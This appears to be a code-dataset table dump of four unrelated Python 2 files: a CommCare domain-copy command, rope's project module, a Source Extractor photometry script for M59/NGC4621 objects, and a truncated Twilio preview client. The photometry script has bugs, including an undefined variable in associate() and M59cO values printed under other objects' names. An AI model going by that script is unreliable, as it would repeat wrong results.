gt stringclasses 1 value | context stringlengths 2.49k 119k |
|---|---|
from multiprocessing import Process, Queue
import sys
import os
from couchdbkit import ResourceNotFound, ResourceConflict
from django.conf import settings
from django.core.management.base import BaseCommand, CommandError
from http_parser.http import ParserError
from restkit import RequestError
from corehq.apps.domain.models import Domain
from corehq.apps.domainsync.management.commands.copy_utils import copy_postgres_data_for_docs
from corehq.util.couchdb_management import CouchConfig
from corehq.util.dates import iso_string_to_date
from dimagi.utils.couch.database import iter_docs
from corehq.apps.domainsync.config import DocumentTransform, save
from optparse import make_option
# doctypes we want to be careful not to copy, which must be explicitly
# specified with --include
from dimagi.utils.parsing import json_format_date
DEFAULT_EXCLUDE_TYPES = [
'ReportNotification',
'WeeklyNotification',
'DailyNotification'
]
NUM_PROCESSES = 8
class Command(BaseCommand):
help = "Copies the contents of a domain to another database. " \
"If targetdb is not specified, the target is the database " \
"specified by COUCH_DATABASE in your settings."
args = '<sourcedb> <domain> [<targetdb>]'
option_list = BaseCommand.option_list + (
make_option('--include',
action='store',
dest='doc_types',
default='',
help='Comma-separated list of Document Types to copy'),
make_option('--exclude',
action='store',
dest='doc_types_exclude',
default='',
help='Comma-separated list of Document Types to NOT copy.'),
make_option('--exclude-attachments',
action='store_true',
dest='exclude_attachments',
default=False,
help="Don't copy document attachments, just the docs themselves."),
make_option('--since',
action='store',
dest='since',
default='',
help='Only copy documents newer than this date. Format: yyyy-MM-dd. Only '),
make_option('--list-types',
action='store_true',
dest='list_types',
default=False,
help='Don\'t copy anything, just list all the available document types.'),
make_option('--simulate',
action='store_true',
dest='simulate',
default=False,
help='Don\'t copy anything, print what would be copied.'),
make_option('--id-file',
action='store',
dest='id_file',
default='',
help="File containing one document ID per line. Only docs with these ID's will be copied"),
make_option('--postgres-db',
action='store',
dest='postgres_db',
default='',
help="Name of postgres database to pull additional data from. This should map to a "
"key in settings.DATABASES. If not specified no additional postgres data will be "
"copied. This is currently used to pull CommCare Supply models."),
make_option('--postgres-password',
action='store',
dest='postgres_password',
default='',
help="Password for postgres database to pull additional data from. If not specified will "
"default to the value in settings.DATABASES"),
make_option('--dont-run-multi-process',
action='store_false',
dest='run_multi_process',
default=True,
help="If set to true this spawn multiple processes which should speed up the time taken to "
"copy. This must be false if running in a supervised process")
)
def iter_source_dbs(self):
for sourcedb_name, sourcedb in self.source_couch.all_dbs_by_slug.items():
if sourcedb_name not in self.exclude_dbs:
print "In {} db".format(sourcedb_name or "the main")
yield sourcedb_name, sourcedb
def handle(self, *args, **options):
if len(args) not in [2, 3]:
raise CommandError('Usage is copy_domain %s' % self.args)
self.exclude_dbs = (
# these have data we don't want to copy
'receiverwrapper', 'auditcare', 'fluff-bihar', 'fluff-opm',
'fluff-mc', 'fluff-cvsu', 'mvp-indicators', 'm4change',
# todo: missing domain/docs, but probably want to add back
'meta',
)
self.source_couch = source_couch = CouchConfig(args[0])
domain = args[1].strip()
simulate = options['simulate']
exclude_attachments = options['exclude_attachments']
self.run_multi_process = options['run_multi_process']
since = json_format_date(iso_string_to_date(options['since'])) if options['since'] else None
if options['list_types']:
for sourcedb_name, sourcedb in self.iter_source_dbs():
self.list_types(sourcedb, domain, since)
sys.exit(0)
if simulate:
print "\nSimulated run, no data will be copied.\n"
if options['postgres_db'] and options['postgres_password']:
settings.DATABASES[options['postgres_db']]['PASSWORD'] = options['postgres_password']
self.targetdb = CouchConfig(args[2]) if len(args) == 3 else CouchConfig()
try:
domain_doc = Domain.get_by_name(domain)
except ResourceNotFound:
domain_doc = None
if domain_doc is None:
self.copy_domain(source_couch, domain)
if options['doc_types']:
doc_types = options['doc_types'].split(',')
for doc_type in doc_types:
sourcedb = source_couch.get_db_for_doc_type(doc_type)
startkey = [x for x in [domain, doc_type, since] if x is not None]
endkey = [x for x in [domain, doc_type, {}] if x is not None]
self.copy_docs(sourcedb, domain, simulate, startkey, endkey, doc_type=doc_type, since=since,
postgres_db=options['postgres_db'], exclude_attachments=exclude_attachments)
elif options['id_file']:
path = options['id_file']
if not os.path.isfile(path):
print "Path '%s' does not exist or is not a file" % path
sys.exit(1)
with open(path) as input:
doc_ids = [line.rstrip('\n') for line in input]
if not doc_ids:
print "Path '%s' does not contain any document ID's" % path
sys.exit(1)
for sourcedb_name, sourcedb in self.iter_source_dbs():
self.copy_docs(sourcedb, domain, simulate, doc_ids=doc_ids, postgres_db=options['postgres_db'],
exclude_attachments=exclude_attachments)
else:
startkey = [domain]
endkey = [domain, {}]
exclude_types = DEFAULT_EXCLUDE_TYPES + options['doc_types_exclude'].split(',')
for sourcedb_name, sourcedb in self.iter_source_dbs():
self.copy_docs(sourcedb, domain, simulate, startkey, endkey, exclude_types=exclude_types,
postgres_db=options['postgres_db'], exclude_attachments=exclude_attachments)
def list_types(self, sourcedb, domain, since):
doc_types = sourcedb.view("by_domain_doc_type_date/view", startkey=[domain],
endkey=[domain, {}], reduce=True, group=True, group_level=2)
doc_count = dict([(row['key'][1], row['value']) for row in doc_types])
if since:
for doc_type in sorted(doc_count.iterkeys()):
num_since = sourcedb.view("by_domain_doc_type_date/view", startkey=[domain, doc_type, since],
endkey=[domain, doc_type, {}], reduce=True).all()
num = num_since[0]['value'] if num_since else 0
print "{0:<30}- {1:<6} total {2}".format(doc_type, num, doc_count[doc_type])
else:
for doc_type in sorted(doc_count.iterkeys()):
print "{0:<30}- {1}".format(doc_type, doc_count[doc_type])
def copy_docs(self, sourcedb, domain, simulate, startkey=None, endkey=None, doc_ids=None,
doc_type=None, since=None, exclude_types=None, postgres_db=None, exclude_attachments=False):
if not doc_ids:
doc_ids = [result["id"] for result in sourcedb.view("by_domain_doc_type_date/view", startkey=startkey,
endkey=endkey, reduce=False)]
total = len(doc_ids)
count = 0
msg = "Found %s matching documents in domain: %s" % (total, domain)
msg += " of type: %s" % (doc_type) if doc_type else ""
msg += " since: %s" % (since) if since else ""
print msg
err_log = self._get_err_log()
if self.run_multi_process:
queue = Queue(150)
for i in range(NUM_PROCESSES):
Worker(queue, sourcedb, self.targetdb, exclude_types, total, simulate, err_log, exclude_attachments).start()
for doc in iter_docs(sourcedb, doc_ids, chunksize=100):
count += 1
queue.put((doc, count))
# shutdown workers
for i in range(NUM_PROCESSES):
queue.put(None)
else:
for doc in iter_docs(sourcedb, doc_ids, chunksize=100):
target = self.targetdb.get_db_for_doc_type(doc['doc_type'])
count += 1
copy_doc(doc, count, sourcedb, target, exclude_types, total, simulate, exclude_attachments)
err_log.close()
if os.stat(err_log.name)[6] == 0:
os.remove(err_log.name)
else:
print 'Failed document IDs written to %s' % err_log.name
if postgres_db:
copy_postgres_data_for_docs(postgres_db, doc_ids=doc_ids, simulate=simulate)
def copy_domain(self, source_couch, domain):
print "Copying domain doc"
sourcedb = source_couch.get_db_for_class(Domain)
result = sourcedb.view(
"domain/domains",
key=domain,
reduce=False,
include_docs=True
).first()
if result and 'doc' in result:
domain_doc = Domain.wrap(result['doc'])
dt = DocumentTransform(domain_doc._obj, sourcedb)
save(dt, self.targetdb.get_db_for_doc_type(domain_doc['doc_type']))
else:
print "Domain doc not found for domain %s." % domain
def _get_err_log(self):
name = 'copy_domain.err.%s'
for i in range(1000): # arbitrarily large number
candidate = name % i
if not os.path.isfile(candidate):
return open(candidate, 'a', buffering=1)
class Worker(Process):
def __init__(self, queue, sourcedb, targetdb, exclude_types, total, simulate, err_log, exclude_attachments):
super(Worker, self).__init__()
self.queue = queue
self.sourcedb = sourcedb
self.targetdb = targetdb
self.exclude_types = exclude_types
self.exclude_attachments = exclude_attachments
self.total = total
self.simulate = simulate
self.err_log = err_log
def run(self):
for doc, count in iter(self.queue.get, None):
try:
target = self.targetdb.get_db_for_doc_type(doc['doc_type'])
copy_doc(doc, count, self.sourcedb, target, self.exclude_types, self.total, self.simulate,
self.exclude_attachments)
except Exception, e:
self.err_log.write('%s\n' % doc["_id"])
print " Document %s failed! Error is: %s %s" % (doc["_id"], e.__class__.__name__, e)
def copy_doc(doc, count, sourcedb, targetdb, exclude_types, total, simulate, exclude_attachments):
if exclude_types and doc["doc_type"] in exclude_types:
print " SKIPPED (excluded type: %s). Synced %s/%s docs (%s: %s)" % \
(doc["doc_type"], count, total, doc["doc_type"], doc["_id"])
else:
if not simulate:
for i in reversed(range(5)):
try:
dt = DocumentTransform(doc, sourcedb, exclude_attachments)
break
except RequestError:
if i == 0:
raise
for i in reversed(range(5)):
try:
save(dt, targetdb)
break
except (ResourceConflict, ParserError, TypeError):
if i == 0:
raise
print " Synced %s/%s docs (%s: %s)" % (count, total, doc["doc_type"], doc["_id"])
| |
import cPickle as pickle
import os
import shutil
import sys
import warnings
import rope.base.fscommands
from rope.base import exceptions, taskhandle, prefs, history, pycore, utils
from rope.base.resourceobserver import *
from rope.base.resources import File, Folder, _ResourceMatcher
class _Project(object):
def __init__(self, fscommands):
self.observers = []
self.fscommands = fscommands
self.prefs = prefs.Prefs()
self.data_files = _DataFiles(self)
def get_resource(self, resource_name):
"""Get a resource in a project.
`resource_name` is the path of a resource in a project. It is
the path of a resource relative to project root. Project root
folder address is an empty string. If the resource does not
exist a `exceptions.ResourceNotFound` exception would be
raised. Use `get_file()` and `get_folder()` when you need to
get nonexistent `Resource`\s.
"""
path = self._get_resource_path(resource_name)
if not os.path.exists(path):
raise exceptions.ResourceNotFoundError(
'Resource <%s> does not exist' % resource_name)
elif os.path.isfile(path):
return File(self, resource_name)
elif os.path.isdir(path):
return Folder(self, resource_name)
else:
raise exceptions.ResourceNotFoundError('Unknown resource '
+ resource_name)
def validate(self, folder):
"""Validate files and folders contained in this folder
It validates all of the files and folders contained in this
folder if some observers are interested in them.
"""
for observer in list(self.observers):
observer.validate(folder)
def add_observer(self, observer):
"""Register a `ResourceObserver`
See `FilteredResourceObserver`.
"""
self.observers.append(observer)
def remove_observer(self, observer):
"""Remove a registered `ResourceObserver`"""
if observer in self.observers:
self.observers.remove(observer)
def do(self, changes, task_handle=taskhandle.NullTaskHandle()):
"""Apply the changes in a `ChangeSet`
Most of the time you call this function for committing the
changes for a refactoring.
"""
self.history.do(changes, task_handle=task_handle)
def get_pycore(self):
return self.pycore
def get_file(self, path):
"""Get the file with `path` (it may not exist)"""
return File(self, path)
def get_folder(self, path):
"""Get the folder with `path` (it may not exist)"""
return Folder(self, path)
def is_ignored(self, resource):
return False
def get_prefs(self):
return self.prefs
def _get_resource_path(self, name):
pass
@property
@utils.saveit
def history(self):
return history.History(self)
@property
@utils.saveit
def pycore(self):
return pycore.PyCore(self)
def close(self):
warnings.warn('Cannot close a NoProject',
DeprecationWarning, stacklevel=2)
ropefolder = None
class Project(_Project):
"""A Project containing files and folders"""
def __init__(self, projectroot, fscommands=None,
ropefolder='.ropeproject', **prefs):
"""A rope project
:parameters:
- `projectroot`: The address of the root folder of the project
- `fscommands`: Implements the file system operations used
by rope; have a look at `rope.base.fscommands`
- `ropefolder`: The name of the folder in which rope stores
project configurations and data. Pass `None` for not using
such a folder at all.
- `prefs`: Specify project preferences. These values
overwrite config file preferences.
"""
if projectroot != '/':
projectroot = _realpath(projectroot).rstrip('/\\')
self._address = projectroot
self._ropefolder_name = ropefolder
if not os.path.exists(self._address):
os.mkdir(self._address)
elif not os.path.isdir(self._address):
raise exceptions.RopeError('Project root exists and'
' is not a directory')
if fscommands is None:
fscommands = rope.base.fscommands.create_fscommands(self._address)
super(Project, self).__init__(fscommands)
self.ignored = _ResourceMatcher()
self.file_list = _FileListCacher(self)
self.prefs.add_callback('ignored_resources', self.ignored.set_patterns)
if ropefolder is not None:
self.prefs['ignored_resources'] = [ropefolder]
self._init_prefs(prefs)
def get_files(self):
return self.file_list.get_files()
def _get_resource_path(self, name):
return os.path.join(self._address, *name.split('/'))
def _init_ropefolder(self):
if self.ropefolder is not None:
if not self.ropefolder.exists():
self._create_recursively(self.ropefolder)
if not self.ropefolder.has_child('config.py'):
config = self.ropefolder.create_file('config.py')
config.write(self._default_config())
def _create_recursively(self, folder):
if folder.parent != self.root and not folder.parent.exists():
self._create_recursively(folder.parent)
folder.create()
def _init_prefs(self, prefs):
run_globals = {}
if self.ropefolder is not None:
config = self.get_file(self.ropefolder.path + '/config.py')
run_globals.update({'__name__': '__main__',
'__builtins__': __builtins__,
'__file__': config.real_path})
if config.exists():
config = self.ropefolder.get_child('config.py')
execfile(config.real_path, run_globals)
else:
exec(self._default_config(), run_globals)
if 'set_prefs' in run_globals:
run_globals['set_prefs'](self.prefs)
for key, value in prefs.items():
self.prefs[key] = value
self._init_other_parts()
self._init_ropefolder()
if 'project_opened' in run_globals:
run_globals['project_opened'](self)
def _default_config(self):
import rope.base.default_config
import inspect
return inspect.getsource(rope.base.default_config)
def _init_other_parts(self):
# Forcing the creation of `self.pycore` to register observers
self.pycore
def is_ignored(self, resource):
return self.ignored.does_match(resource)
def sync(self):
"""Closes project open resources"""
self.close()
def close(self):
"""Closes project open resources"""
self.data_files.write()
def set(self, key, value):
"""Set the `key` preference to `value`"""
self.prefs.set(key, value)
@property
def ropefolder(self):
if self._ropefolder_name is not None:
return self.get_folder(self._ropefolder_name)
def validate(self, folder=None):
if folder is None:
folder = self.root
super(Project, self).validate(folder)
root = property(lambda self: self.get_resource(''))
address = property(lambda self: self._address)
class NoProject(_Project):
"""A null object for holding out of project files.
This class is singleton use `get_no_project` global function
"""
def __init__(self):
fscommands = rope.base.fscommands.FileSystemCommands()
super(NoProject, self).__init__(fscommands)
def _get_resource_path(self, name):
real_name = name.replace('/', os.path.sep)
return _realpath(real_name)
def get_resource(self, name):
universal_name = _realpath(name).replace(os.path.sep, '/')
return super(NoProject, self).get_resource(universal_name)
def get_files(self):
return []
_no_project = None
def get_no_project():
if NoProject._no_project is None:
NoProject._no_project = NoProject()
return NoProject._no_project
class _FileListCacher(object):
def __init__(self, project):
self.project = project
self.files = None
rawobserver = ResourceObserver(
self._changed, self._invalid, self._invalid,
self._invalid, self._invalid)
self.project.add_observer(rawobserver)
def get_files(self):
if self.files is None:
self.files = set()
self._add_files(self.project.root)
return self.files
def _add_files(self, folder):
for child in folder.get_children():
if child.is_folder():
self._add_files(child)
elif not self.project.is_ignored(child):
self.files.add(child)
def _changed(self, resource):
if resource.is_folder():
self.files = None
def _invalid(self, resource, new_resource=None):
self.files = None
class _DataFiles(object):
def __init__(self, project):
self.project = project
self.hooks = []
def read_data(self, name, compress=False, import_=False):
if self.project.ropefolder is None:
return None
compress = compress and self._can_compress()
opener = self._get_opener(compress)
file = self._get_file(name, compress)
if not compress and import_:
self._import_old_files(name)
if file.exists():
input = opener(file.real_path, 'rb')
try:
result = []
try:
while True:
result.append(pickle.load(input))
except EOFError:
pass
if len(result) == 1:
return result[0]
if len(result) > 1:
return result
finally:
input.close()
def write_data(self, name, data, compress=False):
if self.project.ropefolder is not None:
compress = compress and self._can_compress()
file = self._get_file(name, compress)
opener = self._get_opener(compress)
output = opener(file.real_path, 'wb')
try:
pickle.dump(data, output, 2)
finally:
output.close()
def add_write_hook(self, hook):
self.hooks.append(hook)
def write(self):
for hook in self.hooks:
hook()
def _can_compress(self):
try:
import gzip
return True
except ImportError:
return False
def _import_old_files(self, name):
old = self._get_file(name + '.pickle', False)
new = self._get_file(name, False)
if old.exists() and not new.exists():
shutil.move(old.real_path, new.real_path)
def _get_opener(self, compress):
if compress:
try:
import gzip
return gzip.open
except ImportError:
pass
return open
def _get_file(self, name, compress):
path = self.project.ropefolder.path + '/' + name
if compress:
path += '.gz'
return self.project.get_file(path)
def _realpath(path):
"""Return the real path of `path`
Is equivalent to ``realpath(abspath(expanduser(path)))``.
"""
path = path or ''
# there is a bug in cygwin for os.path.abspath() for abs paths
if sys.platform == 'cygwin':
if path[1:3] == ':\\':
return path
return os.path.abspath(os.path.expanduser(path))
return os.path.realpath(os.path.abspath(os.path.expanduser(path)))
| |
'''
Determine optimum aperture and use Source Extractor to get photometry
'''
import sys
import os
from subprocess import call, Popen, PIPE
import glob
import math
import numpy as np
import Sources
import Quadtree
import createSexConfig
import createSexParam
import findBestAperture
import calcZeropoint
import makeRegionFile
import phot_utils
import geom_utils
verbose=True
def associate(list1, tree2, tree3):
dist = 0.001
matches = []
for entry in list1:
match2 = tree2.match(entry.ra, entry.dec)
if match2 != None and geom_utils.equnorm(entry.ra, entry.dec, match.ra, match.dec) <= dist:
match3 = tree3.match(entry.ra, entry.dec)
if match3 != None and geom_utils.equnorm(entry.ra, entry.dec, match3.ra, match3.dec) <= dist:
# Match2 is r-magnitudes
entry.match2 = match2.mag_aper
# Match3 is i-magnitudes
entry.match3 = match3.mag_aper
matches.append(entry)
return matches
def get_photometry(system, in_images):
subs= []
imgs = []
with(open(in_images, "r")) as f:
for line in f:
cols = line.split()
subs.append(cols[0])
imgs.append(cols[1])
filter_file = "default.conv"
param_file = createSexParam.createSexParam(system, False)
path = '/Users/alexawork/Documents/GlobularClusters/Data/NGC4621'
for galsub, img in zip(subs, imgs):
image = phot_utils.load_fits(img, verbose=False)
path = os.getcwd()
fname = system + '_' + img[-6]
seeing = [1, 1]
satur = image[0].header['SATURATE']
#ap = findBestAperture.findBestAperture(path, img, satur, seeing[0])
ap = 5
# Extract sources with initial rough estimate of seeing
config = createSexConfig.createSexConfig(fname, filter_file,
param_file, satur, seeing[0], "nill", ap, False)
call(['sex', '-c', config, galsub, img])
seeing = phot_utils.calc_seeing(fname + '.cat', verbose=verbose)
"If the aperture is less than the seeing round it up to next interger"
if ap < seeing[1]:
ap = math.ceil(seeing[1])
# Re-extract with refined seeing
config = createSexConfig.createSexConfig(fname, filter_file,
param_file, satur, seeing[0], "nill", ap, False)
call(['sex', '-c', config, galsub, img])
# Re-name the check images created
checks = (glob.glob('*.fits'))
if not os.path.isdir('CheckImages'):
os.mkdir('CheckImages')
for check in checks:
os.rename(check, fname + '_' + check)
call(['mv', fname + '_' + check, 'CheckImages'])
def correct_mags(galaxy, catalog, band):
print "band: ", band
zp = calcZeropoint.calcZP(galaxy, catalog, band)
if verbose:
print "Zeropoint for " + band + "-band", zp
with open(catalog, 'r') as f:
tmp = filter(lambda line: phot_utils.no_head(line), f)
sources = map(lambda line: Sources.SCAMSource(line), tmp)
for source in sources:
source.mag_aper = round(source.mag_aper + zp, 3)
source.mag_auto = round(source.mag_auto + zp, 3)
source.mag_best = round(source.mag_best + zp, 3)
new_catalog = 'zpcorrected_' + catalog
with open(new_catalog, 'w') as output:
output.write(''.join(map(lambda source: '%5s' % source.name + '%15s' % source.flux_iso +
'%15s' % source.fluxerr_iso + '%15s' % source.flux_aper +
'%15s' % source.fluxerr_aper + '%15s' % source.ximg + '%15s' % source.yimg +
'%15s' % source.ra + '%15s' % source.dec + '%15s' % source.mag_auto +
'%15s' % source.mag_auto_err + '%15s' % source.mag_best +
'%15s' % source.mag_best_err + '%15s' % source.mag_aper +
'%15s' % source.mag_aper_err + '%15s' % source.a_world +
'%15s' % source.a_world_err + '%15s' % source.b_world +
'%15s' % source.b_world_err + '%15s' % source.theta_err +
'%15s' % source.theta + '%15s' % source.isoarea + '%15s' % source.mu +
'%15s' % source.flux_radius + '%15s' % source.flags + '%15s' % source.fwhm +
'%15s' % source.elogation + '%15s' % source.vignet + '\n', sources)))
return new_catalog
def make_trees(catalog):
with open(catalog, 'r') as f:
tmp = filter(lambda line: phot_utils.no_head(line), f)
tmp2 = map(lambda line: Sources.SCAMSource(line), tmp)
ra = map(lambda line: line.ra, tmp2)
dec = map(lambda line: line.dec, tmp2)
sources = Quadtree.ScamEquatorialQuadtree(min(ra), min(dec),
max(ra), max(dec))
map(lambda line: sources.insert(line), tmp2)
#if verbose:
# makeRegionFile.makeRegionFile('NGC4621_i.cat', 'NGC4621_i.reg', 10, 'blue')
return sources
def main():
# get_photometry(sys.argv[1], sys.argv[2])
# catalogs = (glob.glob('NGC4621*.cat'))
# for catalog in catalogs:
# if verbose:
# print "Working on catalog: ", catalog
# corrected_catalog = correct_mags(sys.argv[1], catalog, catalog[-5])
catalogs = (glob.glob('zpcorrected*.cat'))
trees = {}
for catalog in catalogs:
trees[catalog[-5]] = make_trees(catalog)
m59_ucd3_i = trees['i'].match(190.54601, 11.64478)
m59_ucd3_g = trees['g'].match(190.54601, 11.64478)
m59_ucd3_r = trees['r'].match(190.54601, 11.64478)
print '\n'
print "M59-UCD3's Location in catalog: ", m59_ucd3_i.name
print 'MAG_AUTO: '
print "I Mag and G Mag: ", m59_ucd3_i.mag_auto, m59_ucd3_g.mag_auto
print 'M59-UCD3 g-i: ', m59_ucd3_g.mag_auto - m59_ucd3_i.mag_auto
print 'MAG_APER: '
print "I Mag and G Mag: ", m59_ucd3_i.mag_aper, m59_ucd3_g.mag_aper
print 'M59-UCD3 g-i: ', m59_ucd3_g.mag_aper - m59_ucd3_i.mag_aper
print 'M59-UCD3 FWHM: ', m59_ucd3_g.fwhm*0.2
print 'M59_UCD3 Half-Light Radius: ', m59_ucd3_g.flux_radius
print "Coordinates from i-band catalog - "
print phot_utils.convertRA(m59_ucd3_i.ra), phot_utils.convertDEC(m59_ucd3_i.dec)
print "Coordinates from g-band catalog - "
print phot_utils.convertRA(m59_ucd3_g.ra), phot_utils.convertDEC(m59_ucd3_g.dec)
print '\n'
print '\n'
m59cO_i = trees['i'].match(190.48056, 11.66771)
m59cO_g = trees['g'].match(190.48056, 11.66771)
m59cO_r = trees['r'].match(190.48056, 11.66771)
print "M59cO's Location in catalog: ", m59cO_i.name
print "MAG_AUTO: "
print "I Mag and G Mag: ", m59cO_i.mag_auto, m59cO_g.mag_auto
print 'M59cO g-i: ', m59cO_g.mag_auto - m59cO_i.mag_auto
print "MAG_APER: "
print "I Mag and G Mag: ", m59cO_i.mag_aper, m59cO_g.mag_aper
print 'M59cO g-i: ', m59cO_g.mag_aper - m59cO_i.mag_aper
print 'M59cO Half-Light Radius: ', m59cO_g.flux_radius
print "Coordinates from i-band catalog - "
print phot_utils.convertRA(m59cO_i.ra), phot_utils.convertDEC(m59cO_i.dec)
print "Coordinates from g-band catalog - "
print phot_utils.convertRA(m59cO_g.ra), phot_utils.convertDEC(m59cO_g.dec)
print '\n'
print '\n'
m59_gcx_i = trees['i'].match(190.50245, 11.65993)
m59_gcx_g = trees['g'].match(190.50245, 11.65993)
m59_gcx_r = trees['r'].match(190.50245, 11.65993)
print "M59_gcx's Location in catalog: ", m59cO_i.name
print "MAG_AUTO: "
print "I Mag and G Mag: ", m59cO_i.mag_auto, m59cO_g.mag_auto
print 'M59_gcx g-i: ', m59cO_g.mag_auto - m59cO_i.mag_auto
print "MAG_APER: "
print "I Mag and G Mag: ", m59cO_i.mag_aper, m59cO_g.mag_aper
print 'M59_gcx g-i: ', m59cO_g.mag_aper - m59cO_i.mag_aper
print 'M59_gcx Half-Light Radius: ', m59cO_g.flux_radius
print "Coordinates from i-band catalog - "
print phot_utils.convertRA(m59cO_i.ra), phot_utils.convertDEC(m59cO_i.dec)
print "Coordinates from g-band catalog - "
print phot_utils.convertRA(m59cO_g.ra), phot_utils.convertDEC(m59cO_g.dec)
print '\n'
print '\n'
m59_gcy_i = trees['i'].match(190.51231, 11.63986)
m59_gcy_g = trees['g'].match(190.51231, 11.63986)
m59_gcy_r = trees['r'].match(190.51231, 11.63986)
print "M59_gcy's Location in catalog: ", m59cO_i.name
print "MAG_AUTO: "
print "I Mag and G Mag: ", m59cO_i.mag_auto, m59cO_g.mag_auto
print 'M59_gcy g-i: ', m59cO_g.mag_auto - m59cO_i.mag_auto
print "MAG_APER: "
print "I Mag and G Mag: ", m59cO_i.mag_aper, m59cO_g.mag_aper
print 'M59_gcy g-i: ', m59cO_g.mag_aper - m59cO_i.mag_aper
print 'M59_gcy Half-Light Radius: ', m59cO_g.flux_radius
print "Coordinates from i-band catalog - "
print phot_utils.convertRA(m59cO_i.ra), phot_utils.convertDEC(m59cO_i.dec)
print "Coordinates from g-band catalog - "
print phot_utils.convertRA(m59cO_g.ra), phot_utils.convertDEC(m59cO_g.dec)
print '\n'
print '\n'
ngc_4621_aimss1_i = trees['i'].match(190.47050, 11.63001)
ngc_4621_aimss1_g = trees['g'].match(190.47050, 11.63001)
ngc_4621_aimss1_r = trees['r'].match(190.47050, 11.63001)
print "ngc_4621_aimss's Location in catalog: ", m59cO_i.name
print "MAG_AUTO: "
print "I Mag and G Mag: ", m59cO_i.mag_auto, m59cO_g.mag_auto
print 'ngc_4621_aimss g-i: ', m59cO_g.mag_auto - m59cO_i.mag_auto
print "MAG_APER: "
print "I Mag and G Mag: ", m59cO_i.mag_aper, m59cO_g.mag_aper
print 'ngc_4621_aimss g-i: ', m59cO_g.mag_aper - m59cO_i.mag_aper
print 'ngc_4621_aimss Half-Light Radius: ', m59cO_g.flux_radius
print "Coordinates from i-band catalog - "
print phot_utils.convertRA(m59cO_i.ra), phot_utils.convertDEC(m59cO_i.dec)
print "Coordinates from g-band catalog - "
print phot_utils.convertRA(m59cO_g.ra), phot_utils.convertDEC(m59cO_g.dec)
print '\n'
print '\n'
# with open('NGC4621_g.cat', 'r') as catalog:
# tmp = filter(lambda line: phot_utils.no_head(line), catalog)
# g_sources = map(lambda source: Sources.SCAMSource(source), tmp)
#
# r_sources = make_trees('NGC4621_r.cat')
# i_sources = make_trees('NGC4621_i.cat')
#
# matches = associate(g_sources, r_sources, i_sources)
#
# with open('matched_gri.cat', 'w') as out:
# out.write()
if __name__ == '__main__':
sys.exit(main())
| |
# coding=utf-8
r"""
This code was generated by
\ / _ _ _| _ _
| (_)\/(_)(_|\/| |(/_ v1.0.0
/ /
"""
from twilio.base import values
from twilio.base.instance_context import InstanceContext
from twilio.base.instance_resource import InstanceResource
from twilio.base.list_resource import ListResource
from twilio.base.page import Page
class CpsList(ListResource):
""" PLEASE NOTE that this class contains preview products that are subject
to change. Use them with caution. If you currently do not have developer
preview access, please contact help@twilio.com. """
def __init__(self, version):
"""
Initialize the CpsList
:param Version version: Version that contains the resource
:returns: twilio.rest.preview.trusted_comms.cps.CpsList
:rtype: twilio.rest.preview.trusted_comms.cps.CpsList
"""
super(CpsList, self).__init__(version)
# Path Solution
self._solution = {}
def get(self):
"""
Constructs a CpsContext
:returns: twilio.rest.preview.trusted_comms.cps.CpsContext
:rtype: twilio.rest.preview.trusted_comms.cps.CpsContext
"""
return CpsContext(self._version, )
def __call__(self):
"""
Constructs a CpsContext
:returns: twilio.rest.preview.trusted_comms.cps.CpsContext
:rtype: twilio.rest.preview.trusted_comms.cps.CpsContext
"""
return CpsContext(self._version, )
def __repr__(self):
"""
Provide a friendly representation
:returns: Machine friendly representation
:rtype: str
"""
return '<Twilio.Preview.TrustedComms.CpsList>'
class CpsPage(Page):
""" PLEASE NOTE that this class contains preview products that are subject
to change. Use them with caution. If you currently do not have developer
preview access, please contact help@twilio.com. """
def __init__(self, version, response, solution):
"""
Initialize the CpsPage
:param Version version: Version that contains the resource
:param Response response: Response from the API
:returns: twilio.rest.preview.trusted_comms.cps.CpsPage
:rtype: twilio.rest.preview.trusted_comms.cps.CpsPage
"""
super(CpsPage, self).__init__(version, response)
# Path Solution
self._solution = solution
def get_instance(self, payload):
"""
Build an instance of CpsInstance
:param dict payload: Payload response from the API
:returns: twilio.rest.preview.trusted_comms.cps.CpsInstance
:rtype: twilio.rest.preview.trusted_comms.cps.CpsInstance
"""
return CpsInstance(self._version, payload, )
def __repr__(self):
"""
Provide a friendly representation
:returns: Machine friendly representation
:rtype: str
"""
return '<Twilio.Preview.TrustedComms.CpsPage>'
class CpsContext(InstanceContext):
""" PLEASE NOTE that this class contains preview products that are subject
to change. Use them with caution. If you currently do not have developer
preview access, please contact help@twilio.com. """
def __init__(self, version):
"""
Initialize the CpsContext
:param Version version: Version that contains the resource
:returns: twilio.rest.preview.trusted_comms.cps.CpsContext
:rtype: twilio.rest.preview.trusted_comms.cps.CpsContext
"""
super(CpsContext, self).__init__(version)
# Path Solution
self._solution = {}
self._uri = '/CPS'.format(**self._solution)
def fetch(self, x_xcnam_sensitive_phone_number=values.unset):
"""
Fetch the CpsInstance
:param unicode x_xcnam_sensitive_phone_number: Phone number to retrieve CPS.
:returns: The fetched CpsInstance
:rtype: twilio.rest.preview.trusted_comms.cps.CpsInstance
"""
headers = values.of({'X-Xcnam-Sensitive-Phone-Number': x_xcnam_sensitive_phone_number, })
payload = self._version.fetch(method='GET', uri=self._uri, headers=headers, )
return CpsInstance(self._version, payload, )
def __repr__(self):
"""
Provide a friendly representation
:returns: Machine friendly representation
:rtype: str
"""
context = ' '.join('{}={}'.format(k, v) for k, v in self._solution.items())
return '<Twilio.Preview.TrustedComms.CpsContext {}>'.format(context)
class CpsInstance(InstanceResource):
""" PLEASE NOTE that this class contains preview products that are subject
to change. Use them with caution. If you currently do not have developer
preview access, please contact help@twilio.com. """
def __init__(self, version, payload):
"""
Initialize the CpsInstance
:returns: twilio.rest.preview.trusted_comms.cps.CpsInstance
:rtype: twilio.rest.preview.trusted_comms.cps.CpsInstance
"""
super(CpsInstance, self).__init__(version)
# Marshaled Properties
self._properties = {
'cps_url': payload.get('cps_url'),
'phone_number': payload.get('phone_number'),
'url': payload.get('url'),
}
# Context
self._context = None
self._solution = {}
@property
def _proxy(self):
"""
Generate an instance context for the instance, the context is capable of
performing various actions. All instance actions are proxied to the context
:returns: CpsContext for this CpsInstance
:rtype: twilio.rest.preview.trusted_comms.cps.CpsContext
"""
if self._context is None:
self._context = CpsContext(self._version, )
return self._context
@property
def cps_url(self):
"""
:returns: CPS URL of the phone number.
:rtype: unicode
"""
return self._properties['cps_url']
@property
def phone_number(self):
"""
:returns: Phone number passed.
:rtype: unicode
"""
return self._properties['phone_number']
@property
def url(self):
"""
:returns: The URL of this resource.
:rtype: unicode
"""
return self._properties['url']
def fetch(self, x_xcnam_sensitive_phone_number=values.unset):
"""
Fetch the CpsInstance
